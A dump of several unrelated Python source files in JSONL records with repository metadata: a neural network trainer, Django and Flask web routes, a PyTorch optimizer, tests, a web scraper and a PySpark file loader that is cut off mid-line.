print(\"conn1: {0}\".format(conn_layer1[i].output))\r\n\r\n for j in range(l2):\r\n Layer2[j].summer()\r\n # print(\" \")\r\n for i in range(len(conn_layer2)):\r\n conn_layer2[i].apply_weight()\r\n # print(\"conn2: {0}\".format(conn_layer2[i].output))\r\n\r\n for j in range(l3):\r\n Layer3[j].summer()\r\n\r\n for i in range(len(conn_layer3)):\r\n conn_layer3[i].apply_weight()\r\n\r\n\r\n#feed_forward()\r\n\r\n\r\ndef fn():\r\n print(Layer2[0].num_dendrites())\r\n print(Layer3[0].num_dendrites())\r\n print(len(conn_layer1))\r\n print(len(conn_layer2))\r\n\r\n\r\ndef backprop(expected):\r\n g_errors = []\r\n # delta of layer 3:\r\n for i in range(len(Layer3)):\r\n g_errors.append(Layer3[i].sumout - expected[i])\r\n Layer3[i].delta = -g_errors[i] * der_sig(Layer3[i].sum) # derivative of sigmoid\r\n #Layer3[i].delta = -(Layer3[i].sumout - expected[i])*learning_rate\r\n # delta of layer 2:\r\n for hidden_layer in range(1, num_layers - 1):\r\n for i in range(widths[num_layers - hidden_layer - 1]): # 1\r\n sum_portion = 0\r\n for j in range(widths[num_layers - hidden_layer]): # 2\r\n weight = conn_layer2[i * widths[num_layers - hidden_layer] + j].weight # 2\r\n sum_portion += weight * Layer3[j].delta\r\n Layer2[i].delta = der_sig(Layer2[i].sum) * sum_portion\r\n\r\n # grad of conn layer2 :\r\n # for connlayer in range(num_layers - 2,0,-1):\r\n for i in range(widths[1]): # 1\r\n for j in range(widths[2]): # 2\r\n conn_layer2[i * widths[2] + j].gradient = Layer3[j].delta * Layer2[i].sumout # 2\r\n\r\n # change weights in layer 2\r\n for i in range(widths[1]): # 1\r\n for j in range(widths[2]): # 2\r\n conn_layer2[i * widths[2] + j].del_weight = learning_rate * conn_layer2[i * widths[2] + j].gradient + \\\r\n momentum * learning_rate * conn_layer2[\r\n i * widths[2] + j].prev_del_weight # 222\r\n # conn_layer2[i * widths[2] + j].weight += conn_layer2[i*widths[2]+j].del_weight\r\n conn_layer2[i * widths[2] + j].sum_del_weight += conn_layer2[i * widths[2] + j].del_weight # 22\r\n conn_layer2[i * widths[2] + j].prev_del_weight = conn_layer2[i * widths[2] + j].del_weight # 22\r\n\r\n # grad of conn layer1\r\n for i in range(widths[0]):\r\n for j in range(widths[1]):\r\n conn_layer1[i * widths[1] + j].gradient = Layer2[j].delta * Layer1[i].sumout\r\n\r\n # change weights in conn layer1\r\n for i in range(widths[0]):\r\n for j in range(widths[1]):\r\n conn_layer1[i * widths[1] + j].del_weight = learning_rate * conn_layer1[i * widths[1] + j].gradient + \\\r\n momentum * learning_rate * conn_layer1[\r\n i * widths[1] + j].prev_del_weight\r\n # conn_layer1[i * widths[1] + j].weight += conn_layer1[i*widths[1]+j].del_weight\r\n conn_layer1[i * widths[1] + j].sum_del_weight += conn_layer1[i * widths[1] + j].del_weight\r\n conn_layer1[i * widths[1] + j].prev_del_weight = conn_layer1[i * widths[1] + j].del_weight\r\n\r\n\r\ncount = 0\r\n\r\n\r\ndef clear_sum_deltas():\r\n for i in range(widths[1]):\r\n for j in range(widths[2]):\r\n conn_layer2[i * widths[2] + j].sum_del_weight = 0\r\n for i in range(widths[0]):\r\n for j in range(widths[1]):\r\n conn_layer1[i * widths[1] + j].sum_del_weight = 0\r\n\r\n\r\ndef add_deltas():\r\n for i in range(widths[1]):\r\n for j in range(widths[2]):\r\n conn_layer2[i * widths[2] + j].weight += conn_layer2[i * widths[2] + j].sum_del_weight\r\n for i in range(widths[0]):\r\n for j in range(widths[1]):\r\n conn_layer1[i * widths[1] + j].weight += conn_layer1[i * widths[1] + j].sum_del_weight\r\n\r\n\r\n\r\nsq_sum = 0\r\n\r\ndef apply_input(ip_no):\r\n for i in range(len(inputs[0])):\r\n Layer1[i].sumout = inputs[ip_no][i]\r\n\r\n\r\n# while Layer3[0].sumout > 0.45:\r\n\r\ndef stop(event):\r\n global close\r\n close = True\r\nroot.bind(\"\", stop)\r\n\r\n\r\ndef train():\r\n global mse\r\n global epochs\r\n global close\r\n close = False\r\n sq_sum = 1\r\n count = 0\r\n print(\"\\nTraining...\")\r\n # for i in range(5000):\r\n while not close: #sq_sum > 0.001:\r\n clear_sum_deltas()\r\n\r\n\r\n for j in range(len(inputs)):\r\n apply_input(j)\r\n Connection.max_weight = 1\r\n Connection.min_weight = 0\r\n feed_forward()\r\n for neuron_num in range(widths[2]):\r\n sq_sum += (Layer3[neuron_num].sumout - expected[j][neuron_num]) ** 2\r\n backprop(expected[j])\r\n sq_sum /= len(inputs)\r\n #print(\"MSE: {}\".format(sq_sum))\r\n mse = sq_sum\r\n\r\n count += 1\r\n epochs=count\r\n add_deltas()\r\n if count%100 == 0:\r\n redraw(j)\r\n\r\n print(\"Epochs : {}\".format(count))\r\n print(\"MSE: {}\".format(sq_sum))\r\n\r\n\r\ndef printall(layer):\r\n print(\" : \", end=\"\")\r\n for i in range(len(layer)):\r\n print(\"{0:.2f}\".format(layer[i].sumout), end=\"\")\r\n print(\", \", end=\"\")\r\n print()\r\n\r\n\r\ndef print_weights():\r\n print(\"Layer 1 \\t\\t\\t Layer 2\")\r\n count = 0\r\n\r\n while count < len(conn_layer1) or count < len(conn_layer2):\r\n if count < len(conn_layer1):\r\n print(conn_layer1[count].weight, end=\" \\t \")\r\n if count < len(conn_layer2):\r\n print(conn_layer2[count].weight, end=\"\")\r\n print()\r\n count += 1\r\n\r\n\r\n#print_weights()\r\n\r\n#redraw_del()\r\nwaiting = True\r\nprint(\"Number of neurons \")\r\nprint(Neuron.num_neurons)\r\nprint(\"Number of connections \")\r\nprint(Connection.num_connections)\r\nprint(\"before: \")\r\nfor j in range(len(inputs)):\r\n apply_input(j)\r\n for i in range(len(inputs[0])):\r\n print(\"{} \".format(inputs[j][i]), end=\"\")\r\n feed_forward()\r\n printall(Layer3)\r\n for neuron_num in range(widths[2]):\r\n sq_sum += (Layer3[neuron_num].sumout - expected[j][neuron_num]) ** 2\r\n backprop(expected[j])\r\nsq_sum /= len(inputs)\r\nprint(\"MSE: {}\".format(sq_sum))\r\n\r\n\r\ntrain()\r\nprint(\"after training:\")\r\n\r\nfor j in range(len(inputs)):\r\n apply_input(j)\r\n for i in range(len(inputs[0])):\r\n print(\"{} \".format(inputs[j][i]), end=\"\")\r\n feed_forward()\r\n printall(Layer3)\r\n\r\nprint(\"new ip: \")\r\nfor j in range(len(newinput)):\r\n for i in range(len(newinput[0])):\r\n Layer1[i].sumout = newinput[j][i]\r\n for i in range(len(newinput[0])):\r\n print(\"{} \".format(newinput[j][i]), end=\"\")\r\n feed_forward()\r\n printall(Layer3)\r\n# printWeights()\r\n\r\nConnection.wip = True\r\nclose = False\r\n\r\nprint(\"Min {} , max {}\".format(Connection.min_weight, Connection.max_weight))\r\nprint(\"Min {} , max {}\".format(conn_layer1[0].min_weight, conn_layer1[0].max_weight))\r\n\r\nprint(\"Min {} , max {}\".format(conn_layer1[1].min_weight, conn_layer1[1].max_weight))\r\nprint(\"Min {} , max wip {}\".format(Connection.min_weight_wip, Connection.max_weight_wip))\r\n\r\ndef doSomething():\r\n # check if saving\r\n # if not:\r\n global close\r\n close = True\r\n root.destroy()\r\nroot.protocol('WM_DELETE_WINDOW', doSomething) # root is your root window\r\n\r\nip_app=0\r\ndef key(event):\r\n global ip_app\r\n ip_app += 1\r\n if ip_app >= len(inputs):\r\n ip_app = 0\r\n Connection.max_weight = 1\r\n Connection.min_weight = 0\r\n apply_input(ip_app)\r\n feed_forward()\r\n redraw(ip_app)\r\n\r\nroot.bind(\"\", key)\r\n\r\nroot.mainloop()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"TanmayDeshmukh/ANN-without-numpy","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":17931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"800962775","text":"from django.urls import path\nfrom .views import register,index,addfile,user_login,logout_view,Detail\n\nurlpatterns = [\n path('',index,name='index'),\n path('register/', register, name='register'),\n path('login/', user_login, name='login'),\n path('logout/', logout_view, name='logout'),\n path('add/', addfile, name='add'),\n path('detail/', Detail, name='detail'),\n\n\n]\n","repo_name":"guluzadef/File-upload","sub_path":"todo_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72852309662","text":"\r\n# Copyright 2020 Huawei Technologies Co., Ltd\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\n \r\nimport torch\r\nfrom torch.optim.optimizer import Optimizer, required\r\n\r\n\r\nclass CaffeSGD(Optimizer):\r\n r\"\"\"Implements actual stochastic gradient descent (optionally with momentum).\r\n\r\n Nesterov momentum is based on the formula from\r\n `On the importance of initialization and momentum in deep learning`__.\r\n\r\n Args:\r\n params (iterable): iterable of parameters to optimize or dicts defining\r\n parameter groups\r\n lr (float): learning rate\r\n momentum (float, optional): momentum factor (default: 0)\r\n weight_decay (float, optional): weight decay (L2 penalty) (default: 0)\r\n dampening (float, optional): dampening for momentum (default: 0)\r\n nesterov (bool, optional): enables Nesterov momentum (default: False)\r\n \"\"\"\r\n\r\n def __init__(self, params, lr=required, momentum=0, dampening=0,\r\n weight_decay=0, nesterov=False):\r\n if lr is not required and lr < 0.0:\r\n raise ValueError(\"Invalid learning rate: {}\".format(lr))\r\n if momentum < 0.0:\r\n raise ValueError(\"Invalid momentum value: {}\".format(momentum))\r\n if weight_decay < 0.0:\r\n raise ValueError(\"Invalid weight_decay value: {}\".format(weight_decay))\r\n\r\n defaults = dict(lr=lr, momentum=momentum, dampening=dampening,\r\n weight_decay=weight_decay, nesterov=nesterov)\r\n if nesterov and (momentum <= 0 or dampening != 0):\r\n raise ValueError(\"Nesterov momentum requires a momentum and zero dampening\")\r\n super(CaffeSGD, self).__init__(params, defaults)\r\n\r\n def __setstate__(self, state):\r\n super(CaffeSGD, self).__setstate__(state)\r\n for group in self.param_groups:\r\n group.setdefault('nesterov', False)\r\n\r\n @torch.no_grad()\r\n def step(self, closure=None):\r\n \"\"\"Performs a single optimization step.\r\n\r\n Arguments:\r\n closure (callable, optional): A closure that reevaluates the model\r\n and returns the loss.\r\n \"\"\"\r\n loss = None\r\n if closure is not None:\r\n with torch.enable_grad():\r\n loss = closure()\r\n\r\n for group in self.param_groups:\r\n weight_decay = group['weight_decay']\r\n momentum = group['momentum']\r\n dampening = group['dampening']\r\n nesterov = group['nesterov']\r\n\r\n for p in group['params']:\r\n if p.grad is None:\r\n continue\r\n d_p = p.grad\r\n if weight_decay != 0:\r\n d_p = d_p.add(p, alpha=weight_decay)\r\n\r\n d_p.mul_(group['lr'])\r\n\r\n if momentum != 0:\r\n param_state = self.state[p]\r\n if 'momentum_buffer' not in param_state:\r\n buf = param_state['momentum_buffer'] = torch.zeros_like(p.data)\r\n buf.mul_(momentum).add_(d_p)\r\n else:\r\n buf = param_state['momentum_buffer']\r\n buf.mul_(momentum).add_(d_p, alpha=1 - dampening)\r\n if nesterov:\r\n d_p = d_p.add(buf, alpha=momentum)\r\n else:\r\n d_p = buf\r\n\r\n p.data.add_(-1, d_p)\r\n\r\n return loss\r\n","repo_name":"Ascend/ModelZoo-PyTorch","sub_path":"PyTorch/built-in/cv/object_tracking/GOTURN_for_PyTorch/src/goturn/optimizer/caffeSGD.py","file_name":"caffeSGD.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"7"} +{"seq_id":"826004080","text":"from flask import Flask, request, g, make_response, abort\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_moment import Moment\nfrom flask_httpauth import HTTPTokenAuth, HTTPBasicAuth\nimport secrets\nfrom datetime import datetime as dt, timedelta\nfrom functools import wraps\nimport os\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp = Flask(__name__)\ndb = SQLAlchemy()\nmigrate = Migrate()\nmoment = Moment()\ntoken_auth = HTTPTokenAuth()\nbasic_auth = HTTPBasicAuth()\n\n##---------- Database ----------##\nclass Config():\n SECRET_KEY = os.environ.get(\"SECRET_KEY\")\n SQLALCHEMY_DATABASE_URI = \"sqlite:///\" + os.path.join(basedir, 'app.db')\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n##---------- Database ----------##\n\n##---------- Database Information ----------##\nclass User(db.Model):\n user_id = db.Column(db.Integer, primary_key=True)\n first_name = db.Column(db.String)\n last_name = db.Column(db.String)\n email = db.Column(db.String, unique=True, index=True)\n password = db.Column(db.String)\n created_on = db.Column(db.DateTime, default=dt.utcnow)\n is_admin = db.Column(db.Boolean, default=False)\n token = db.Column(db.String, index=True, unique=True)\n token_exp = db.Column(db.DateTime)\n\n ##---------- Token Methods ----------##\n def get_token(self, exp=86400):\n current_time = dt.utcnow()\n if self.token and self.token_exp > current_time + timedelta(seconds=60):\n return self.token\n self.token = secrets.token_urlsafe(32)\n self.token_exp = current_time + timedelta(seconds=exp)\n self.save()\n return self.token\n\n def revoke_token(self):\n self.token_exp = dt.utcnow() - timedelta(seconds=61)\n \n @staticmethod\n def check_token(token):\n user = User.query.filter_by(token=token).first()\n if not user or user.token_exp < dt.utcnow():\n return None\n return user\n ##---------- Token Methods ----------##\n\n ##---------- User Methods ----------##\n def __repr__(self):\n return f''\n\n def __str__(self):\n return f''\n\n def from_dict(self, data):\n self.first_name = data['first_name']\n self.last_name = data['last_name']\n self.email=data['email']\n self.password = self.hash_password(data['password'])\n self.icon = data['icon']\n\n def save(self):\n db.session.add(self) \n db.session.commit()\n\n def to_dict(self):\n return {\n 'id':self.id,\n 'first_name':self.first_name,\n 'last_name':self.last_name,\n 'email':self.email,\n 'created_on':self.created_on,\n 'icon':self.icon,\n 'is_admin':self.is_admin,\n 'token':self.token\n }\n\nclass Book(db.Model):\n book_id = db.Column(db.Integer, primary_key = True)\n title = db.Column(db.String)\n author = db.Column(db.String)\n pages = db.Column(db.Integer)\n summary = db.Column(db.String)\n image = db.Column(db.String)\n\n def __repr__(self):\n return f''\n\n def edit(self, new_title):\n self.title=new_title\n\n def save(self):\n db.session.add(self) \n db.session.commit() \n \n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def to_dict(self):\n return {\n 'book_id': self.book_id,\n 'title': self.title,\n 'author': self.author,\n 'pages ': self.pages,\n 'summary': self.summary,\n 'image': self.image\n }\n##---------- Database Information ----------##\n\n##---------- Auth Information ----------##\n\n@token_auth.verify_token\ndef verify_token(token):\n user = User.check_token(token) if token else None\n g.current_user = user\n return user\n\n@basic_auth.verify_password\ndef verify_password(email, password):\n user = User.query.filter_by(email=email).first()\n if user is None:\n return False\n g.current_user = user\n return user.check_hashed_password(password)\n\n##---------- Auth Information ----------##\n\n##---------- Helpers ----------##\n\ndef require_admin(f, *args, **kwargs):\n @wraps(f)\n def check_admin(*args, **kwargs):\n if not g.current_user.is_admin:\n abort(403)\n else:\n return f(*args, **kwargs)\n return check_admin\n\n##---------- Helpers ----------##\n\n##---------- /login ----------##\n# GET => Returns User info (not password) along with the User Token\n@app.get('/login')\n@basic_auth.login_required()\ndef get_login():\n user = g.current_user\n token = user.get_token()\n return make_response({\"token\": token, **user.to_dict()}, 200)\n##---------- /login ----------##\n\n##---------- /user ----------##\n# POST => Register a User\n# PUT => Edit a user by id\n# DELETE => Remove a User by id\n # \"first_name\" = \"String\"\n # \"last_name\" = \"String\"\n # \"email\" = \"String\"\n # \"password\" = \"String\"\n # \"created_on\" = \"DateTime\"\n # \"is_admin\" = \"Boolean\"\n \n@app.post('/user/')\n@token_auth.login_required()\n@require_admin\ndef register_user(id):\n new_user_dict = request.get_json()\n if not all(key in new_user_dict for key in ('first_name', 'last_name', 'email', 'password', 'created_on', 'is_admin')):\n abort(404)\n new_user = User()\n new_user.from_dict(new_user_dict)\n new_user.save()\n return make_response(f\"User {new_user.first_name} {new_user.last_name} has been created with id: {new_user.id}\", 200)\n\n@app.put('/user/')\n@token_auth.login_required()\n@require_admin\ndef put_user(id):\n user_dict = request.get_json()\n user = User.query.get(id)\n if not user:\n abort(404)\n user.from_dict(user_dict)\n user.save()\n return make_response(f\"User {user.id} has been udpated\", 200)\n\n@app.delete('/user/')\n@token_auth.login_required()\n@require_admin\ndef delete_user(id):\n user_to_delete = User.query.get(id)\n if not user_to_delete:\n abort(404)\n user_to_delete.delete()\n return make_response(f\"User with id {id} has been deleted\", 200)\n\n##---------- /book ----------##\n# /book\n# GET => Return a list of all Books\n# GET => Return book info for book by id\n# POST => Creates a new Book \n# PUT => Edits a Book by id\n# DELETE => Delete a Book by id\n\n# GET => Return a list of all Books\n@app.get('/book')\n@token_auth.login_required()\ndef get_book():\n books = Book.query.all()\n book_dicts = [book.to_dict() for book in books]\n return make_response({\"books\": book_dicts}, 200)\n\n# GET => Return book info for book by id\n@app.get('/book/')\n@token_auth.login_required()\ndef get_book_by_id(id):\n book = Book.query.get(id)\n if not book:\n abort(404)\n book_dict = book.to_dict()\n return make_response(book_dict, 200)\n \n# POST => Creates a new Book \n # \"title\" = \"String\"\n # \"author\" = \"String\"\n # \"pages\" = \"Integer\"\n # \"summary\" = \"String\"\n # \"image\" = \"String\"\n\n@app.post('/book')\n@token_auth.login_required()\n@require_admin\ndef post_book():\n book_dict = request.get_json()\n if not all(key in book_dict for key in ('title', 'author', 'pages', 'summary', 'image')):\n abort(404)\n book = Book()\n book.from_dict()\n book.save()\n return make_response(f\"Book {book.title} was created with an id {book.id}\", 200)\n\n\n# PUT => Edits a Book by id\n@app.put('/book/')\n@token_auth.login_required()\n@require_admin\ndef put_book(id):\n book_dict = request.get_json()\n book = Book.query.get(id)\n if not book:\n abort(404)\n book.from_dict(book_dict)\n book.save()\n make_response(f\"Book {book.title} with ID {book.id} has been updated\", 200)\n\n# DELETE => Delete a Book by id\n@app.delete('/item/')\n@token_auth.login_required()\n@require_admin\ndef delete_book(id):\n book_to_delete = Book.query.get(id)\n if not book_to_delete:\n abort(404)\n book_to_delete.delete()\n return make_response(f\"Book with id: {id} has been removed\",200)\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"ItsDakk/wk7_api_project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"69916395745","text":"from collections import deque, defaultdict\nimport sys\ninput = sys.stdin.readline\nN, M = map(int, input().split())\nGraph = defaultdict(list)\nfor _ in range(N - 1):\n u, v, w = map(int, input().split())\n Graph[u].append([v, w])\n Graph[v].append([u, w])\n\ndef BFS(start, end):\n Queue = deque([[start, 0]])\n visited = [False] * (N + 1)\n visited[start] = True\n while Queue:\n cur, w = Queue.popleft()\n\n for next, dist in Graph[cur]:\n if not visited[next]:\n if next == end:\n return w + dist\n visited[next] = True\n Queue.append([next, w + dist])\n return 0\n\nfor _ in range(M):\n s, e = map(int, input().split())\n print(BFS(s, e))\n","repo_name":"alsrua7222/BOJ_Algorithm_Study","sub_path":"Solved/1000/1240/1240.py","file_name":"1240.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1117567707","text":"import pytest\nimport torch\nfrom src.config import TransformerModelConfig, EnvironmentConfig\nfrom src.models.trajectory_model import DecisionTransformer\nfrom src.environments.environments import make_env\nfrom src.decision_transformer.train import evaluate_dt_agent\nfrom src.decision_transformer.offline_dataset import TrajectoryDataset\n\n# need an agent.\n\n# def test_train():\n# pass\n\n# def test_test():\n# pass\n\n\ndef test_evaluate_dt_agent():\n\n trajectory_path = \"tests/fixtures/test_trajectories.pkl\"\n trajectory_data_set = TrajectoryDataset(\n trajectory_path,\n pct_traj=1, device=\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n env_id = trajectory_data_set.metadata['args']['env_id']\n env = make_env(env_id, seed=1, idx=0, capture_video=False,\n run_name=\"dev\", fully_observed=False, max_steps=30)\n env = env()\n\n # dt = DecisionTransformer(\n # env=env,\n # d_model=128,\n # n_heads=4,\n # d_mlp=256,\n # n_layers=2,\n # state_embedding_type=\"grid\", # hard-coded for now to minigrid.\n # max_timestep=1000,\n # n_ctx=3, # one timestep of context\n # device=\"cuda\" if torch.cuda.is_available() else \"cpu\",\n # ) # Our DT must have a context window large enough\n\n dt = DecisionTransformer(\n environment_config=EnvironmentConfig(\n env_id=env_id,\n one_hot_obs=trajectory_data_set.observation_type == \"one_hot\",\n view_size=7, # trajectory_data_set.metadata['args']['view_size'],\n fully_observed=False,\n capture_video=False,\n render_mode='rgb_array',\n max_steps=1000),\n transformer_config=TransformerModelConfig(\n d_model=128,\n n_heads=4,\n d_mlp=256,\n n_layers=2,\n state_embedding_type=\"grid\", # hard-coded for now to minigrid.\n # max_timestep=1000,\n n_ctx=3, # one timestep of context\n device=\"cuda\" if torch.cuda.is_available() else \"cpu\",\n ))\n\n if hasattr(dt, \"environment_config\"):\n max_steps = min(dt.environment_config.max_steps, 10)\n else:\n max_steps = min(dt.max_timestep, 10)\n\n batch = 0\n eval_env_func = make_env(\n env_id=env.spec.id,\n seed=batch,\n idx=0,\n capture_video=True,\n max_steps=max_steps,\n run_name=f\"dt_eval_videos_{batch}\",\n fully_observed=False,\n flat_one_hot=(trajectory_data_set.observation_type == \"one_hot\"),\n )\n\n statistics = evaluate_dt_agent(\n env_id=env_id,\n model=dt,\n env_func=eval_env_func,\n track=False,\n initial_rtg=1,\n trajectories=10,\n device=\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n assert statistics[\"prop_completed\"] == 0.0\n assert statistics[\"prop_truncated\"] == 1.0\n assert statistics[\"mean_reward\"] == 0.0\n assert statistics[\"prop_positive_reward\"] == 0.0\n # traj length approx 10\n assert statistics[\"mean_traj_length\"] == pytest.approx(10.0, 1.0)\n","repo_name":"echowne/DecisionTransformerInterpretability","sub_path":"tests/acceptance/test_dt_train.py","file_name":"test_dt_train.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"26599916184","text":"from bs4 import BeautifulSoup\nimport requests\nfrom fake_useragent import UserAgent\n\nUserAgent().chrome\n\n# определяем список ключевых слов\nKEYWORDS = [\"web\", \"python\", \"Привет\", \"РФ\"]\nheader={'User-Agent': UserAgent().chrome}\n\nbase_url = \"https://habr.com/\"\nurl = base_url + \"ru/all\"\n\nresponse = requests.get(url, headers=header)\ndata = response.text\nsoup = BeautifulSoup(data, features=\"html.parser\")\narticles = soup.find_all(\"article\")\nfor article in articles:\n publishigs = article.find(class_=\"tm-article-body tm-article-snippet__lead\")\n publishigs = str(publishigs.text)\n date_publishig = article.find(\"time\").attrs['title']\n title = article.find(\"h2\").find(\"span\").text\n href = article.find(class_ = \"tm-article-snippet__title-link\").attrs[\"href\"]\n for el in KEYWORDS:\n if el in publishigs:\n print()\n print(f'{ date_publishig}, {title}', {base_url + href})\n print(\"-\"*100)\n print(publishigs)\n ","repo_name":"Hamlet-Oganisyan/Professional_work_with_Python","sub_path":"3_Parssing/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21986983076","text":"import pytest\r\nfrom pytest_mock import MockerFixture\r\nfrom httpx import AsyncClient\r\nfrom starlette import status\r\nfrom fastapi.applications import FastAPI\r\n\r\npytestmark = pytest.mark.asyncio\r\n\r\n\r\ncreated_team = {\"id\": 1, \"name\": \"team\", \"description\": \"description\"}\r\n\r\n\r\nasync def test_get_teams(client: AsyncClient, mocker: MockerFixture):\r\n mocker.patch(\r\n \"app.services.team_services.TeamServices.get_all\",\r\n return_value={\r\n \"total_items\": 1,\r\n \"current_page\": 1,\r\n \"total_pages\": 1,\r\n \"items\": [created_team],\r\n },\r\n )\r\n response = await client.get(\"/api/teams\")\r\n rs_body = response.json()\r\n assert len(rs_body[\"items\"]) == rs_body[\"total_items\"]\r\n\r\n\r\nasync def test_create_team(authorized_client: AsyncClient, mocker: MockerFixture):\r\n mocker.patch(\r\n \"app.services.team_services.TeamServices.create\",\r\n return_value=created_team,\r\n )\r\n response = await authorized_client.post(\r\n \"/api/teams\",\r\n json={\"name\": \"team\", \"description\": \"description\"},\r\n )\r\n assert response.status_code == 200\r\n\r\n rs_body = response.json()\r\n assert rs_body[\"name\"] == \"team\"\r\n\r\n\r\nasync def test_cannot_create_team_if_not_logged(\r\n client: AsyncClient, mocker: MockerFixture\r\n):\r\n mocker.patch(\r\n \"app.services.team_services.TeamServices.create\",\r\n return_value=created_team,\r\n )\r\n response = await client.post(\r\n \"/api/teams\",\r\n json={\"name\": \"test\", \"description\": \"test description\"},\r\n )\r\n assert response.status_code == status.HTTP_403_FORBIDDEN\r\n\r\n\r\n@pytest.mark.parametrize(\"role\", [\"invalid_role\"])\r\nasync def test_cannot_create_team_if_not_authorized(\r\n authorized_client: AsyncClient, mocker: MockerFixture\r\n):\r\n mocker.patch(\r\n \"app.services.team_services.TeamServices.create\",\r\n return_value=created_team,\r\n )\r\n response = await authorized_client.post(\r\n \"/api/teams\",\r\n json={\"name\": \"test\", \"description\": \"test description\"},\r\n )\r\n assert response.status_code == status.HTTP_403_FORBIDDEN\r\n","repo_name":"mauriciomendonca-zz/boilerplate","sub_path":"tests/test_api/test_routes/test_teams.py","file_name":"test_teams.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"38009233770","text":"#spark-submit --master local[*] FileLoader.py\r\n#spark-submit --jars spark-csv_2.11-1.5.0.jar,commons-csv-1.8.jar,spark-xml_2.11-0.9.0.jar --master local[*] FileLoader.py\r\n#export PYTHONIOENCODING=utf8\r\n\r\nimport pyspark\r\nfrom pyspark.sql import SparkSession\r\nfrom pyspark.sql.types import StructType,StructField, StringType, IntegerType, ArrayType, DoubleType, BooleanType\r\n\r\nspark = SparkSession.builder.appName('FileLoader').getOrCreate()\r\n#spark = SparkSession.builder.appName('FileLoader').master(\"local\").enableHiveSupport().getOrCreate()\r\nsc = spark.sparkContext\r\nsc.setLogLevel(\"ERROR\")\r\n\r\nfilename=\"hdfs://randstad-niit-bigdataspark-164-52-214-120-e2e7-70155-ncr.cluster:8020/user/bigdata/EmployeesAll.csv\"\r\n\r\ndf = spark.read.csv(filename)\r\ndf.printSchema()\r\n\r\ndf2 = spark.read.option(\"header\",True).csv(filename)\r\ndf2.printSchema()\r\n\r\ndf3 = spark.read.options(header='True', delimiter=',').csv(filename)\r\ndf3.printSchema()\r\n\r\nschema = StructType().add(\"EmployeeId\",IntegerType(),True).add(\"BirthDate\",StringType(),True).add(\"FirstName\",StringType(),True).add(\"LastName\",StringType(),True).add(\"Gender\",StringType(),True).add(\"JoiningDate\",StringType(),True)\r\ndf4 = spark.read.format(\"csv\").option(\"header\", True).schema(schema).load(filename)\r\ndf4.printSchema()\r\ndf4.coalesce(1).write.mode('Overwrite').option(\"header\",True).csv(\"/user/bigdata/EmpNice\")\r\n\r\ndf2.write.csv(\"/user/bigdata/res1\")\r\ndf2.write.mode('Overwrite').csv(\"/user/bigdata/res1\")\r\ndf2.write.mode('Overwrite').option(\"header\",True).csv(\"/user/bigdata/res1\")\r\ndf2.write.mode('Overwrite').json(\"/user/bigdata/res2\")\r\ndf2.coalesce(1).write.mode('Overwrite').parquet(\"/user/bigdata/res3\") \r\ndf2.coalesce(1).write.mode('Overwrite').orc(\"/user/bigdata/res4\")\r\ndf2.coalesce(1).write.mode('Overwrite').format(\"com.databricks.spark.xml\").option(\"rootTag\", \"Employees\").option(\"rowTag\", \"Employee\").save(\"/user/bigdata/res5\")\r\n\r\nmultiline_df = spark.read.option(\"multiline\",\"true\").json(\"hdfs://randstad-niit-bigdataspark-164-52-214-120-e2e7-70155-ncr.cluster:8020/user/bigdata/sample.json\")\r\nmultiline_df.show()\r\n\r\nrdf1=spark.read.parquet(\"/user/bigdata/res3/*\")\r\nrdf1.createOrReplaceTempView(\"emps\")\r\nspark.sql(\"select * from emps where gender = 'M' and first_name like '%Ara%' and last_name like '%Ba%'\").show(truncate=False)\r\n\r\nrdf2=spark.read.orc(\"/user/bigdata/res4/*\")\r\nrdf2.createOrReplaceTempView(\"emps2\")\r\nspark.sql(\"select * from emps2 where gender = 'M' and first_name like '%Ara%' and last_name like '%Ba%'\").show(truncate=False)\r\n\r\nrdf3=spark.read.json(\"hdfs://randstad-niit-bigdataspark-164-52-214-120-e2e7-70155-ncr.cluster:8020/user/bigdata/olympic.json\")\r\nrdf3.createOrReplaceTempView(\"olympic\")\r\nspark.sql(\"select * from olympic limit 10\").show(truncate=False)\r\nrdf3.coalesce(1).write.mode('Overwrite').format(\"com.databricks.spark.avro\").save(\"/user/bigdata/res6\")\r\n\r\nrdf4 = spark.read.format(\"com.databricks.spark.avro\").load(\"/user/bigdata/res6/*.avro\")\r\nrdf4.createOrReplaceTempView(\"olympic2\")\r\nrdf4.printSchema()\r\nspark.sql(\"select * from olympic2 limit 